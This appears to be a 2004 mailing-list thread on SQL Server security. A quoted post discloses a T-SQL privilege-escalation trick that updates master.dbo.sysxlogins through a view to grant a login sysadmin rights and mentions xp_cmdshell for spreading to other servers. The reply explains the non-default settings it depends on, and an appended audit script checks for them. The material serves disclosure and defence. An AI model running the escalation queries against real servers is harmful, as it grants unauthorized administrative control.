Re: Give yourself SQL Administrator rights

From: Sue Hoegemeier (Sue_H_at_nomail.please)
Date: 06/10/04


Date: Wed, 09 Jun 2004 20:40:02 -0600

Even if you change the default settings to allow updates to
the system table, someone would have had to grant
permissions to this user on sysxlogins. Public does not have
permissions to select from sysxlogins. Only members of
sysadmin can select from this table by default.
Allow updates is set to 0 by default (disabled by default).
Only members of the server roles sysadmin and serveradmin
can execute sp_configure to change allow updates to 1
(enabled).
In terms of Cross DB Ownership Chaining, Books Online has
security implications with this documented and it has it
documented that it is not recommended to enable this.
So you'd have to leave a lot of things open and change
permissions in master in order to allow this.
Opening up potential security risks by changing default
settings, permissions can result in many problems. It's not
necessarily something new.

-Sue

On Wed, 09 Jun 2004 23:46:35 GMT, "New SQL Administrator"
<nospam@telus.net> wrote:

>Has this been documented before? Try this on a SQL Server instance where
>the 'Cross DB Ownership Chaining' and 'allow updates' options are enabled
>via sp_configure.
>
>Start with a SQL Server login that is not a SQL Administrator but is the
>database owner of the current database.
>
>
>create view dbo.my_sysxlogins
>as
>select *
>from master.dbo.sysxlogins
>
>select name,xstatus & 16
>from dbo.my_sysxlogins
>where name = system_user
>
>update dbo.my_sysxlogins
>set xstatus = xstatus ^ 16
>where name = system_user
>
>select name,xstatus
>from dbo.my_sysxlogins
>where name = system_user
>
>The account should now be a SQL Administrator. If your servers on the
>network share the same domain service account, xp_cmdshell may be then used
>to become an SQL Administrator on those servers.
>
>This posting is made to bring this knowledge in the public realm so that
>corrections may be made. SQL Server DBAs may wish to disable 'allow
>updates' and/or 'Cross DB Ownership Chaining' to protect any SQL Server
>databases that they manage.
>
>a1b42436@telus.net
>
>
>
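
An audit of the settings and permissions this thread turns on, as an added example that is not part of either post. It assumes a SQL Server 2000 instance (the version that has `sysxlogins`) and a session running as a member of sysadmin; the temp table name `#cfg` is an illustrative choice.

```sql
-- Added example: check the defaults described in the reply above.
USE master
GO
SET NOCOUNT ON

-- sp_configure returns one row per option:
-- name, minimum, maximum, config_value, run_value
CREATE TABLE #cfg (
    name         nvarchar(70),
    minimum      int,
    maximum      int,
    config_value int,
    run_value    int
)

INSERT #cfg EXEC sp_configure 'allow updates'
INSERT #cfg EXEC sp_configure 'Cross DB Ownership Chaining'

-- Both options should be 0. A config_value that differs from run_value
-- means a change has been made but RECONFIGURE has not yet applied it.
SELECT name,
       config_value,
       run_value,
       CASE
           WHEN config_value = 0 AND run_value = 0 THEN 'OK (disabled)'
           WHEN config_value <> run_value THEN 'REVIEW: pending change'
           ELSE 'REVIEW: option enabled'
       END AS finding
FROM #cfg

DROP TABLE #cfg
GO

-- Explicit grants on sysxlogins. An error saying there are no matching
-- rows to report means nothing has been granted on the table.
EXEC sp_helprotect 'sysxlogins'
GO

-- Logins able to run sp_configure and change 'allow updates'.
EXEC sp_helpsrvrolemember 'sysadmin'
EXEC sp_helpsrvrolemember 'serveradmin'
GO
```

To turn an enabled option off, run `EXEC sp_configure '<option name>', 0` followed by `RECONFIGURE`.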


